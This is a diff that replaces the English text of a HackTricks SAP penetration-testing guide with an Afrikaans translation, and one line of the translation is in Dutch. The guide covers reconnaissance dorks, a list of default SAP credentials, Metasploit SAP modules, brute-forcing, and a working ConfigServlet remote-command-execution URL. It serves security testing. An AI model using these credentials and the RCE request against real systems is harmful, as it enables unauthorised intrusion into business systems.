-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
 
 

 
 
-# Introduction about SAP
+# Inleiding oor SAP
 
-SAP stands for Systems Applications and Products in Data Processing. SAP, by definition, is also the name of the ERP \(Enterprise Resource Planning\) software as well as the name of the company.  
-SAP system consists of a number of fully integrated modules, which covers virtually every aspect of business management.
+SAP staan vir Stelseltoepassings en Produkte in Databehandeling. SAP is ook die naam van die ERP \(Enterprise Resource Planning\) sagteware, sowel as die naam van die maatskappy.
+Die SAP-stelsel bestaan uit 'n aantal ten volle geïntegreerde modules wat byna elke aspek van besigheidsbestuur dek.
 
-Each SAP instance \(or SID\) is composed of three layers: database, application and presentation\), each landscape usually consists of four instances: dev, test, QA and production.  
-Each of the layers can be exploited to some extent, but most effect can be gained by **attacking the database**.
+Elke SAP-instansie \(of SID\) bestaan uit drie lae: databasis, toepassing en aanbieding\), elke landskap bestaan gewoonlik uit vier instansies: dev, toets, QA en produksie.
+Elkeen van die lae kan tot 'n mate uitgebuit word, maar die meeste effek kan verkry word deur **die databasis aan te val**.
 
-Each SAP instance is divided into clients. Each one has a user SAP\*, the application’s equivalent of “root”.  
-Upon initial creation, this user SAP\* gets a default password: “060719992” \(more default password below\).  
-You’d be surprised if you knew how often these **passwords aren’t changed in test or dev environments**!
+Elke SAP-instansie is verdeel in kliënte. Elkeen het 'n gebruiker SAP\*, die toepassing se ekwivalent van "root".
+By die aanvanklike skepping kry hierdie gebruiker SAP\* 'n verstek wagwoord: "060719992" \(meer verstek wagwoorde hieronder\).
+Jy sal verbaas wees as jy weet hoe dikwels hierdie **wagwoorde nie verander word in toets- of ontwikkelingsomgewings** nie!
 
-Try to get access to the shell of any server using username <SID>adm.  
-Bruteforcing can help, whoever there can be Account Lockout mechanism.
+Probeer om toegang tot die skulp van enige bediener te kry deur die gebruikersnaam <SID>adm te gebruik.
+Bruteforcing kan help, maar daar kan 'n rekeningblokkering meganisme wees.
 
-# Discovery
+# Ontdekking
 
-> Next section is mostly from [https://github.com/shipcod3/mySapAdventures](https://github.com/shipcod3/mySapAdventures) from user shipcod3!
-
-* Check the Application Scope or Program Brief for testing. Take note of the hostnames or system instances for connecting to SAP GUI.
-* Use OSINT \(open source intelligence\), Shodan and Google Dorks to check for files, subdomains, and juicy information if the application is Internet-facing or public:
+> Die volgende afdeling is meestal van [https://github.com/shipcod3/mySapAdventures](https://github.com/shipcod3/mySapAdventures) deur gebruiker shipcod3!
 
+* Kontroleer die Toepassingsomvang of Programbeknopte vir toetsing. Neem kennis van die hostnames of stelselinstansies vir die koppeling met SAP GUI.
+* Gebruik OSINT \(open source intelligence\), Shodan en Google Dorks om lêers, subdomeine en interessante inligting te kontroleer as die toepassing aan die internet blootgestel of openbaar is:
 ```text
 inurl:50000/irj/portal
 inurl:IciEventService/IciEventConf
@@ -46,45 +43,41 @@ https://www.shodan.io/search?query=sap+portal
 https://www.shodan.io/search?query=SAP+Netweaver
 https://www.shodan.io/search?query=SAP+J2EE+Engine
 ```
+* Hier is hoe [http://SAP:50000/irj/portal](http://sap:50000/irj/portal) lyk
 
-* Here is what [http://SAP:50000/irj/portal](http://sap:50000/irj/portal) looks like
+![SAP Aanmeldingsskerm](https://raw.githubusercontent.com/shipcod3/mySapAdventures/master/screengrabs/sap%20logon.jpeg)
 
-![SAP Logon screen](https://raw.githubusercontent.com/shipcod3/mySapAdventures/master/screengrabs/sap%20logon.jpeg)
+* Gebruik nmap om oop poorte en bekende dienste (sap routers, webdnypro, webdienste, webbedieners, ens.) te kontroleer.
+* Kruip die URL's as daar 'n webbediener aan die gang is.
+* Fuzz die gidslys (jy kan Burp Intruder gebruik) as dit webbedieners op sekere poorte het. Hier is 'n paar goeie woordelyste wat deur die SecLists Project verskaf word om standaard SAP ICM-paaie en ander interessante gidslys of lêers te vind:
 
-* Use nmap to check for open ports and known services \(sap routers, webdnypro, web services, web servers, etc.\)
-* Crawl the URLs if there is a web server running.
-* Fuzz the directories \(you can use Burp Intruder\) if it has web servers on certain ports. Here are some good wordlists provided by the SecLists Project for finding default SAP ICM Paths and other interesting directories or files:
-
-  [https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/URLs/urls\_SAP.txt](https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/URLs/urls-SAP.txt)  
-  [https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/CMS/SAP.fuzz.txt](https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/CMS/SAP.fuzz.txt)  
-  [https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/sap.txt](https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/sap.txt)
-
-* Use the SAP SERVICE DISCOVERY auxiliary Metasploit module for enumerating SAP instances/services/components:
+[https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/URLs/urls\_SAP.txt](https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/URLs/urls-SAP.txt)
+[https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/CMS/SAP.fuzz.txt](https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/CMS/SAP.fuzz.txt)
+[https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/sap.txt](https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/sap.txt)
 
+* Gebruik die SAP SERVICE DISCOVERY hulpprogram van Metasploit vir die opspoor van SAP instansies/dienste/komponente:
 ```text
 msf > use auxiliary/scanner/sap/sap_service_discovery
 msf auxiliary(sap_service_discovery) > show options
 Module options (auxiliary/scanner/sap/sap_service_discovery):
-   Name         Current Setting  Required  Description
-   ----         ---------------  --------  -----------
-   CONCURRENCY  10               yes       The number of concurrent ports to check per host
-   INSTANCES    00-01            yes       Instance numbers to scan (e.g. 00-05,00-99)
-   RHOSTS                        yes       The target address range or CIDR identifier
-   THREADS      1                yes       The number of concurrent threads
-   TIMEOUT      1000             yes       The socket connect timeout in milliseconds
+Name         Current Setting  Required  Description
+----         ---------------  --------  -----------
+CONCURRENCY  10               yes       The number of concurrent ports to check per host
+INSTANCES    00-01            yes       Instance numbers to scan (e.g. 00-05,00-99)
+RHOSTS                        yes       The target address range or CIDR identifier
+THREADS      1                yes       The number of concurrent threads
+TIMEOUT      1000             yes       The socket connect timeout in milliseconds
 msf auxiliary(sap_service_discovery) > set rhosts 192.168.96.101
 rhosts => 192.168.96.101
 msf auxiliary(sap_service_discovery) > run
 [*] 192.168.96.101:       - [SAP] Beginning service Discovery '192.168.96.101'
 ```
+## Toetsing van die Dik Kliënt / SAP GUI
 
-## Testing the Thick Client / SAP GUI
-
-Here is the command to connect to SAP GUI  
-`sapgui  `
-
-* Check for default credentials \(In Bugcrowd’s Vulnerability Rating Taxonomy, this is considered as P1 -> Server Security Misconfiguration \| Using Default Credentials \| Production Server\):
+Hier is die bevel om aan te sluit by SAP GUI
+`sapgui  `
 
+* Kontroleer vir verstek geloofsbriewe \(In Bugcrowd se Vulnerability Rating Taxonomy, word dit beskou as P1 -> Bediener Sekuriteitsverstellings \| Gebruik van Verstek Geloofsbriewe \| Produksie Bediener\):
 ```text
 # SAP* - High privileges - Hardcoded kernel user
 SAP*:06071992:*
@@ -135,147 +128,139 @@ SAP*:Down1oad:000,001
 DEVELOPER:Down1oad:001
 BWDEVELOPER:Down1oad:001
 ```
+* Voer Wireshark uit en verifieer by die kliënt (SAP GUI) met die geloofsbriewe wat jy gekry het, omdat sommige kliënte geloofsbriewe sonder SSL oordra. Daar is twee bekende invoegtoepassings vir Wireshark wat die hoofkoptekste wat deur die SAP DIAG-protokol gebruik word, kan ontleed: SecureAuth Labs SAP-ontledingsinvoegtoepassing en SAP DIAG-invoegtoepassing deur die Positive Research Center.
+* Kontroleer vir voorregverhogings deur SAP-transaksiekodes (tcodes) vir gebruikers met lae voorregte te gebruik:
+* SU01 - Om gebruikers te skep en te onderhou
+* SU01D - Om gebruikers te vertoon
+* SU10 - Vir massawarting
+* SU02 - Vir handmatige skepping van profiele
+* SM19 - Sekuriteitsoudit - konfigurasie
+* SE84 - Inligtingstelsel vir SAP R/3-volmagte
+* Kontroleer of jy stelselopdragte kan uitvoer / skripte kan hardloop in die kliënt.
+* Kontroleer of jy XSS kan doen op BAPI Explorer
 
-* Run Wireshark then authenticate to the client \(SAP GUI\) using the credentials you got because some clients transmit credentials without SSL. There are two known plugins for Wireshark that can dissect the main headers used by the SAP DIAG protocol too: SecureAuth Labs SAP dissection plug-in and SAP DIAG plugin by Positive Research Center.
-* Check for privilege escalations like using some SAP Transaction Codes \(tcodes\) for low-privilege users:
-  * SU01 - To create and maintain the users
-  * SU01D - To Display Users
-  * SU10 - For mass maintenance
-  * SU02 - For Manual creation of profiles
-  * SM19 - Security audit - configuration
-  * SE84 - Information System for SAP R/3 Authorizations
-* Check if you can execute system commands / run scripts in the client.
-* Check if you can do XSS on BAPI Explorer
+# Toetsing van die webkoppelvlak
 
-# Testing the web interface
+* Kruip deur die URL's (sien ontdekkingsfase).
+* Fuzz die URL's soos in die ontdekkingsfase. Hier is hoe [http://SAP:50000/index.html](http://sap:50000/index.html) lyk:
 
-* Crawl the URLs \(see discovery phase\).
-* Fuzz the URLs like in the discovery phase. Here is what [http://SAP:50000/index.html](http://sap:50000/index.html) looks like:
+![SAP Indeksbladsy](https://raw.githubusercontent.com/shipcod3/mySapAdventures/master/screengrabs/index.jpeg)
 
-![SAP Index Page](https://raw.githubusercontent.com/shipcod3/mySapAdventures/master/screengrabs/index.jpeg)
+* Soek na algemene webkwesbaarhede (Raadpleeg OWASP Top 10) omdat daar XSS, RCE, XXE, ens. kwesbaarhede in sommige plekke is.
+* Kyk na Jason Haddix se "The Bug Hunters Methodology" vir toetsing van webkwesbaarhede.
+* Auth Bypass deur middel van werkwoordversteuring? Miskien :)
+* Maak `http://SAP:50000/webdynpro/resources/sap.com/XXX/JWFTestAddAssignees#` oop en druk dan die "Kies" knoppie en druk dan in die oop venster "Soek". Jy behoort 'n lys van SAP-gebruikers te sien (Kwesbaarheidsverwysing: [ERPSCAN-16-010](https://erpscan.com/advisories/erpscan-16-010-sap-netweaver-7-4-information-disclosure/))
+* Word die geloofsbriewe oorgedra oor HTTP? As dit wel die geval is, word dit beskou as P3 volgens Bugcrowd se [Vulnerability Rating Taxonomy](https://bugcrowd.com/vulnerability-rating-taxonomy): Gebroke outentifikasie en sessiebestuur | Swak aanmeldfunksie oor HTTP. Wenk: Kyk ook na [http://SAP:50000/startPage](http://sap:50000/startPage) of die aanmeldportale :)
 
-* Look for common web vulnerabilities \(Refer to OWASP Top 10\) because there are XSS, RCE, XXE, etc. vulnerabilities in some places.
-* Check out Jason Haddix’s [“The Bug Hunters Methodology”](https://github.com/jhaddix/tbhm) for testing web vulnerabilities.
-* Auth Bypass via verb Tampering? Maybe :\)
-* Open `http://SAP:50000/webdynpro/resources/sap.com/XXX/JWFTestAddAssignees#` then hit the “Choose” Button and then in the opened window press “Search”. You should be able to see a list of SAP users \(Vulnerability Reference: [ERPSCAN-16-010](https://erpscan.com/advisories/erpscan-16-010-sap-netweaver-7-4-information-disclosure/) \)
-* Are the credentials submitted over HTTP? If it is then it is considered as P3 based on Bugcrowd’s [Vulnerability Rating Taxonomy](https://bugcrowd.com/vulnerability-rating-taxonomy): Broken Authentication and Session Management \| Weak Login Function Over HTTP. Hint: Check out [http://SAP:50000/startPage](http://sap:50000/startPage) too or the logon portals :\)
-
-![SAP Start Page](https://raw.githubusercontent.com/shipcod3/mySapAdventures/master/screengrabs/startPage.jpeg)
-
-* Try `/irj/go/km/navigation/` for possible directory listing or authentication bypass
-* [http://SAP/sap/public/info](http://sap/sap/public/info) contains some juicy information:
+![SAP Beginbladsy](https://raw.githubusercontent.com/shipcod3/mySapAdventures/master/screengrabs/startPage.jpeg)
 
+* Probeer `/irj/go/km/navigation/` vir moontlike gidslys of outentifikasie-omseiling
+* [http://SAP/sap/public/info](http://sap/sap/public/info) bevat 'n paar sappige inligting:
 ```xml
 
-	
-		
-			
-				011
-				4102
-				BIG
-				IE3
-				randomnum
-				randomnum
-				BRQ
-				BRQ
-				randomnum
-				ORACLE
-				740
-				324
-				AIX
-				-25200
-				
-				192.168.1.8
-				749
-				randomnum
-				
-				192.168.1.8
-			
-		
-	
+
+
+
+011
+4102
+BIG
+IE3
+randomnum
+randomnum
+BRQ
+BRQ
+randomnum
+ORACLE
+740
+324
+AIX
+-25200
+
+192.168.1.8
+749
+randomnum
+
+192.168.1.8
+
+
+
 
 ```
+# Aanval!
 
-# Attack!
-
-* Check if it runs on old servers or technologies like Windows 2000.
-* Plan the possible exploits / attacks, there are a lot of Metasploit modules for SAP discovery \(auxiliary modules\) and exploits:
-
+* Kontroleer of dit op ou servers of tegnologieë soos Windows 2000 loop.
+* Beplan die moontlike exploits / aanvalle, daar is baie Metasploit-modules vir SAP-ontdekking (hulpmodules) en exploits:
 ```text
 msf > search sap
 Matching Modules
 ================
-   Name                                                                     Disclosure Date  Rank       Description
-   ----                                                                     ---------------  ----       -----------
-   auxiliary/admin/maxdb/maxdb_cons_exec                                    2008-01-09       normal     SAP MaxDB cons.exe Remote Command Injection
-   auxiliary/admin/sap/sap_configservlet_exec_noauth                        2012-11-01       normal     SAP ConfigServlet OS Command Execution
-   auxiliary/admin/sap/sap_mgmt_con_osexec                                                   normal     SAP Management Console OSExecute
-   auxiliary/dos/sap/sap_soap_rfc_eps_delete_file                                            normal     SAP SOAP EPS_DELETE_FILE File Deletion
-   auxiliary/dos/windows/http/pi3web_isapi                                  2008-11-13       normal     Pi3Web ISAPI DoS
-   auxiliary/dos/windows/llmnr/ms11_030_dnsapi                              2011-04-12       normal     Microsoft Windows DNSAPI.dll LLMNR Buffer Underrun DoS
-   auxiliary/scanner/http/sap_businessobjects_user_brute                                     normal     SAP BusinessObjects User Bruteforcer
-   auxiliary/scanner/http/sap_businessobjects_user_brute_web                                 normal     SAP BusinessObjects Web User Bruteforcer
-   auxiliary/scanner/http/sap_businessobjects_user_enum                                      normal     SAP BusinessObjects User Enumeration
-   auxiliary/scanner/http/sap_businessobjects_version_enum                                   normal     SAP BusinessObjects Version Detection
-   auxiliary/scanner/sap/sap_ctc_verb_tampering_user_mgmt                                    normal     SAP CTC Service Verb Tampering User Management
-   auxiliary/scanner/sap/sap_hostctrl_getcomputersystem                                      normal     SAP Host Agent Information Disclosure
-   auxiliary/scanner/sap/sap_icf_public_info                                                 normal     SAP ICF /sap/public/info Service Sensitive Information Gathering
-   auxiliary/scanner/sap/sap_icm_urlscan                                                     normal     SAP URL Scanner
-   auxiliary/scanner/sap/sap_mgmt_con_abaplog                                                normal     SAP Management Console ABAP Syslog Disclosure
-   auxiliary/scanner/sap/sap_mgmt_con_brute_login                                            normal     SAP Management Console Brute Force
-   auxiliary/scanner/sap/sap_mgmt_con_extractusers                                           normal     SAP Management Console Extract Users
-   auxiliary/scanner/sap/sap_mgmt_con_getaccesspoints                                        normal     SAP Management Console Get Access Points
-   auxiliary/scanner/sap/sap_mgmt_con_getenv                                                 normal     SAP Management Console getEnvironment
-   auxiliary/scanner/sap/sap_mgmt_con_getlogfiles                                            normal     SAP Management Console Get Logfile
-   auxiliary/scanner/sap/sap_mgmt_con_getprocesslist                                         normal     SAP Management Console GetProcessList
-   auxiliary/scanner/sap/sap_mgmt_con_getprocessparameter                                    normal     SAP Management Console Get Process Parameters
-   auxiliary/scanner/sap/sap_mgmt_con_instanceproperties                                     normal     SAP Management Console Instance Properties
-   auxiliary/scanner/sap/sap_mgmt_con_listlogfiles                                           normal     SAP Management Console List Logfiles
-   auxiliary/scanner/sap/sap_mgmt_con_startprofile                                           normal     SAP Management Console getStartProfile
-   auxiliary/scanner/sap/sap_mgmt_con_version                                                normal     SAP Management Console Version Detection
-   auxiliary/scanner/sap/sap_router_info_request                                             normal     SAPRouter Admin Request
-   auxiliary/scanner/sap/sap_router_portscanner                                              normal     SAPRouter Port Scanner
-   auxiliary/scanner/sap/sap_service_discovery                                               normal     SAP Service Discovery
-   auxiliary/scanner/sap/sap_smb_relay                                                       normal     SAP SMB Relay Abuse
-   auxiliary/scanner/sap/sap_soap_bapi_user_create1                                          normal     SAP /sap/bc/soap/rfc SOAP Service BAPI_USER_CREATE1 Function User Creation
-   auxiliary/scanner/sap/sap_soap_rfc_brute_login                                            normal     SAP SOAP Service RFC_PING Login Brute Forcer
-   auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec                   normal     SAP /sap/bc/soap/rfc SOAP Service SXPG_CALL_SYSTEM Function Command Injection
-   auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_command_exec                               normal     SAP /sap/bc/soap/rfc SOAP Service SXPG_COMMAND_EXEC Function Command Injection
-   auxiliary/scanner/sap/sap_soap_rfc_eps_get_directory_listing                              normal     SAP SOAP RFC EPS_GET_DIRECTORY_LISTING Directories Information Disclosure
-   auxiliary/scanner/sap/sap_soap_rfc_pfl_check_os_file_existence                            normal     SAP SOAP RFC PFL_CHECK_OS_FILE_EXISTENCE File Existence Check
-   auxiliary/scanner/sap/sap_soap_rfc_ping                                                   normal     SAP /sap/bc/soap/rfc SOAP Service RFC_PING Function Service Discovery
-   auxiliary/scanner/sap/sap_soap_rfc_read_table                                             normal     SAP /sap/bc/soap/rfc SOAP Service RFC_READ_TABLE Function Dump Data
-   auxiliary/scanner/sap/sap_soap_rfc_rzl_read_dir                                           normal     SAP SOAP RFC RZL_READ_DIR_LOCAL Directory Contents Listing
-   auxiliary/scanner/sap/sap_soap_rfc_susr_rfc_user_interface                                normal     SAP /sap/bc/soap/rfc SOAP Service SUSR_RFC_USER_INTERFACE Function User Creation
-   auxiliary/scanner/sap/sap_soap_rfc_sxpg_call_system_exec                                  normal     SAP /sap/bc/soap/rfc SOAP Service SXPG_CALL_SYSTEM Function Command Execution
-   auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec                                      normal     SAP SOAP RFC SXPG_COMMAND_EXECUTE
-   auxiliary/scanner/sap/sap_soap_rfc_system_info                                            normal     SAP /sap/bc/soap/rfc SOAP Service RFC_SYSTEM_INFO Function Sensitive Information Gathering
-   auxiliary/scanner/sap/sap_soap_th_saprel_disclosure                                       normal     SAP /sap/bc/soap/rfc SOAP Service TH_SAPREL Function Information Disclosure
-   auxiliary/scanner/sap/sap_web_gui_brute_login                                             normal     SAP Web GUI Login Brute Forcer
-   exploit/multi/sap/sap_mgmt_con_osexec_payload                            2011-03-08       excellent  SAP Management Console OSExecute Payload Execution
-   exploit/multi/sap/sap_soap_rfc_sxpg_call_system_exec                     2013-03-26       great      SAP SOAP RFC SXPG_CALL_SYSTEM Remote Command Execution
-   exploit/multi/sap/sap_soap_rfc_sxpg_command_exec                         2012-05-08       great      SAP SOAP RFC SXPG_COMMAND_EXECUTE Remote Command Execution
-   exploit/windows/browser/enjoysapgui_comp_download                        2009-04-15       excellent  EnjoySAP SAP GUI ActiveX Control Arbitrary File Download
-   exploit/windows/browser/enjoysapgui_preparetoposthtml                    2007-07-05       normal     EnjoySAP SAP GUI ActiveX Control Buffer Overflow
-   exploit/windows/browser/sapgui_saveviewtosessionfile                     2009-03-31       normal     SAP AG SAPgui EAI WebViewer3D Buffer Overflow
-   exploit/windows/http/sap_configservlet_exec_noauth                       2012-11-01       great      SAP ConfigServlet Remote Code Execution
-   exploit/windows/http/sap_host_control_cmd_exec                           2012-08-14       average    SAP NetWeaver HostControl Command Injection
-   exploit/windows/http/sapdb_webtools                                      2007-07-05       great      SAP DB 7.4 WebTools Buffer Overflow
-   exploit/windows/lpd/saplpd                                               2008-02-04       good       SAP SAPLPD 6.28 Buffer Overflow
-   exploit/windows/misc/sap_2005_license                                    2009-08-01       great      SAP Business One License Manager 2005 Buffer Overflow
-   exploit/windows/misc/sap_netweaver_dispatcher                            2012-05-08       normal     SAP NetWeaver Dispatcher DiagTraceR3Info Buffer Overflow
+Name                                                                     Disclosure Date  Rank       Description
+----                                                                     ---------------  ----       -----------
+auxiliary/admin/maxdb/maxdb_cons_exec                                    2008-01-09       normal     SAP MaxDB cons.exe Remote Command Injection
+auxiliary/admin/sap/sap_configservlet_exec_noauth                        2012-11-01       normal     SAP ConfigServlet OS Command Execution
+auxiliary/admin/sap/sap_mgmt_con_osexec                                                   normal     SAP Management Console OSExecute
+auxiliary/dos/sap/sap_soap_rfc_eps_delete_file                                            normal     SAP SOAP EPS_DELETE_FILE File Deletion
+auxiliary/dos/windows/http/pi3web_isapi                                  2008-11-13       normal     Pi3Web ISAPI DoS
+auxiliary/dos/windows/llmnr/ms11_030_dnsapi                              2011-04-12       normal     Microsoft Windows DNSAPI.dll LLMNR Buffer Underrun DoS
+auxiliary/scanner/http/sap_businessobjects_user_brute                                     normal     SAP BusinessObjects User Bruteforcer
+auxiliary/scanner/http/sap_businessobjects_user_brute_web                                 normal     SAP BusinessObjects Web User Bruteforcer
+auxiliary/scanner/http/sap_businessobjects_user_enum                                      normal     SAP BusinessObjects User Enumeration
+auxiliary/scanner/http/sap_businessobjects_version_enum                                   normal     SAP BusinessObjects Version Detection
+auxiliary/scanner/sap/sap_ctc_verb_tampering_user_mgmt                                    normal     SAP CTC Service Verb Tampering User Management
+auxiliary/scanner/sap/sap_hostctrl_getcomputersystem                                      normal     SAP Host Agent Information Disclosure
+auxiliary/scanner/sap/sap_icf_public_info                                                 normal     SAP ICF /sap/public/info Service Sensitive Information Gathering
+auxiliary/scanner/sap/sap_icm_urlscan                                                     normal     SAP URL Scanner
+auxiliary/scanner/sap/sap_mgmt_con_abaplog                                                normal     SAP Management Console ABAP Syslog Disclosure
+auxiliary/scanner/sap/sap_mgmt_con_brute_login                                            normal     SAP Management Console Brute Force
+auxiliary/scanner/sap/sap_mgmt_con_extractusers                                           normal     SAP Management Console Extract Users
+auxiliary/scanner/sap/sap_mgmt_con_getaccesspoints                                        normal     SAP Management Console Get Access Points
+auxiliary/scanner/sap/sap_mgmt_con_getenv                                                 normal     SAP Management Console getEnvironment
+auxiliary/scanner/sap/sap_mgmt_con_getlogfiles                                            normal     SAP Management Console Get Logfile
+auxiliary/scanner/sap/sap_mgmt_con_getprocesslist                                         normal     SAP Management Console GetProcessList
+auxiliary/scanner/sap/sap_mgmt_con_getprocessparameter                                    normal     SAP Management Console Get Process Parameters
+auxiliary/scanner/sap/sap_mgmt_con_instanceproperties                                     normal     SAP Management Console Instance Properties
+auxiliary/scanner/sap/sap_mgmt_con_listlogfiles                                           normal     SAP Management Console List Logfiles
+auxiliary/scanner/sap/sap_mgmt_con_startprofile                                           normal     SAP Management Console getStartProfile
+auxiliary/scanner/sap/sap_mgmt_con_version                                                normal     SAP Management Console Version Detection
+auxiliary/scanner/sap/sap_router_info_request                                             normal     SAPRouter Admin Request
+auxiliary/scanner/sap/sap_router_portscanner                                              normal     SAPRouter Port Scanner
+auxiliary/scanner/sap/sap_service_discovery                                               normal     SAP Service Discovery
+auxiliary/scanner/sap/sap_smb_relay                                                       normal     SAP SMB Relay Abuse
+auxiliary/scanner/sap/sap_soap_bapi_user_create1                                          normal     SAP /sap/bc/soap/rfc SOAP Service BAPI_USER_CREATE1 Function User Creation
+auxiliary/scanner/sap/sap_soap_rfc_brute_login                                            normal     SAP SOAP Service RFC_PING Login Brute Forcer
+auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec                   normal     SAP /sap/bc/soap/rfc SOAP Service SXPG_CALL_SYSTEM Function Command Injection
+auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_command_exec                               normal     SAP /sap/bc/soap/rfc SOAP Service SXPG_COMMAND_EXEC Function Command Injection
+auxiliary/scanner/sap/sap_soap_rfc_eps_get_directory_listing                              normal     SAP SOAP RFC EPS_GET_DIRECTORY_LISTING Directories Information Disclosure
+auxiliary/scanner/sap/sap_soap_rfc_pfl_check_os_file_existence                            normal     SAP SOAP RFC PFL_CHECK_OS_FILE_EXISTENCE File Existence Check
+auxiliary/scanner/sap/sap_soap_rfc_ping                                                   normal     SAP /sap/bc/soap/rfc SOAP Service RFC_PING Function Service Discovery
+auxiliary/scanner/sap/sap_soap_rfc_read_table                                             normal     SAP /sap/bc/soap/rfc SOAP Service RFC_READ_TABLE Function Dump Data
+auxiliary/scanner/sap/sap_soap_rfc_rzl_read_dir                                           normal     SAP SOAP RFC RZL_READ_DIR_LOCAL Directory Contents Listing
+auxiliary/scanner/sap/sap_soap_rfc_susr_rfc_user_interface                                normal     SAP /sap/bc/soap/rfc SOAP Service SUSR_RFC_USER_INTERFACE Function User Creation
+auxiliary/scanner/sap/sap_soap_rfc_sxpg_call_system_exec                                  normal     SAP /sap/bc/soap/rfc SOAP Service SXPG_CALL_SYSTEM Function Command Execution
+auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec                                      normal     SAP SOAP RFC SXPG_COMMAND_EXECUTE
+auxiliary/scanner/sap/sap_soap_rfc_system_info                                            normal     SAP /sap/bc/soap/rfc SOAP Service RFC_SYSTEM_INFO Function Sensitive Information Gathering
+auxiliary/scanner/sap/sap_soap_th_saprel_disclosure                                       normal     SAP /sap/bc/soap/rfc SOAP Service TH_SAPREL Function Information Disclosure
+auxiliary/scanner/sap/sap_web_gui_brute_login                                             normal     SAP Web GUI Login Brute Forcer
+exploit/multi/sap/sap_mgmt_con_osexec_payload                            2011-03-08       excellent  SAP Management Console OSExecute Payload Execution
+exploit/multi/sap/sap_soap_rfc_sxpg_call_system_exec                     2013-03-26       great      SAP SOAP RFC SXPG_CALL_SYSTEM Remote Command Execution
+exploit/multi/sap/sap_soap_rfc_sxpg_command_exec                         2012-05-08       great      SAP SOAP RFC SXPG_COMMAND_EXECUTE Remote Command Execution
+exploit/windows/browser/enjoysapgui_comp_download                        2009-04-15       excellent  EnjoySAP SAP GUI ActiveX Control Arbitrary File Download
+exploit/windows/browser/enjoysapgui_preparetoposthtml                    2007-07-05       normal     EnjoySAP SAP GUI ActiveX Control Buffer Overflow
+exploit/windows/browser/sapgui_saveviewtosessionfile                     2009-03-31       normal     SAP AG SAPgui EAI WebViewer3D Buffer Overflow
+exploit/windows/http/sap_configservlet_exec_noauth                       2012-11-01       great      SAP ConfigServlet Remote Code Execution
+exploit/windows/http/sap_host_control_cmd_exec                           2012-08-14       average    SAP NetWeaver HostControl Command Injection
+exploit/windows/http/sapdb_webtools                                      2007-07-05       great      SAP DB 7.4 WebTools Buffer Overflow
+exploit/windows/lpd/saplpd                                               2008-02-04       good       SAP SAPLPD 6.28 Buffer Overflow
+exploit/windows/misc/sap_2005_license                                    2009-08-01       great      SAP Business One License Manager 2005 Buffer Overflow
+exploit/windows/misc/sap_netweaver_dispatcher                            2012-05-08       normal     SAP NetWeaver Dispatcher DiagTraceR3Info Buffer Overflow
 ```
-
-* Try to use some known exploits \(check out Exploit-DB\) or attacks like the old but goodie “SAP ConfigServlet Remote Code Execution” in the SAP Portal:
-
+* Probeer om van bekende exploits gebruik te maken (bekijk Exploit-DB) of aanvallen zoals de oude maar goede "SAP ConfigServlet Remote Code Execution" in de SAP Portal:
 ```text
 http://example.com:50000/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=uname -a
 ```
-
 ![SAP Config Servlet RCE](https://raw.githubusercontent.com/shipcod3/mySapAdventures/master/screengrabs/sap_rce.jpeg)
 
-* Before running the `start` command on the bizploit script at the Discovery phase, you can also add the following for performing vulnerability assessment:
-
+* Voordat jy die `start` bevel op die bizploit skrip by die Ontdekkingsfase uitvoer, kan jy ook die volgende byvoeg vir die uitvoering van kwesbaarheidsassessering:
 ```text
 bizploit> plugins
 bizploit/plugins> vulnassess all
@@ -297,22 +282,21 @@ bizploit/plugins> start
 bizploit/plugins> back
 bizploit> start
 ```
+# Ander Nuttige Gereedskap vir Toetsing
 
-# Other Useful Tools for Testing
+* [PowerSAP](https://github.com/airbus-seclab/powersap) - Powershell-gereedskap om SAP-sekuriteit te assesseer
+* [Burp Suite](https://portswigger.net/burp) - 'n moet hê vir gidsfuzzing en web-sekuriteitsassessering
+* [pysap](https://github.com/SecureAuthCorp/pysap) - Python-biblioteek om SAP-netwerkprotokolpakkies te skep
+* [https://github.com/gelim/nmap-erpscan](https://github.com/gelim/nmap-erpscan) - Help nmap om SAP/ERP op te spoor
 
-* [PowerSAP](https://github.com/airbus-seclab/powersap) - Powershell tool to assess sap security
-* [Burp Suite](https://portswigger.net/burp) - a must have for directory fuzzing and web security assessments
-* [pysap](https://github.com/SecureAuthCorp/pysap) - Python library to craft SAP network protocol packets
-* [https://github.com/gelim/nmap-erpscan](https://github.com/gelim/nmap-erpscan) - Help nmap to detect SAP/ERP
+## Verwysings
 
-## References
-
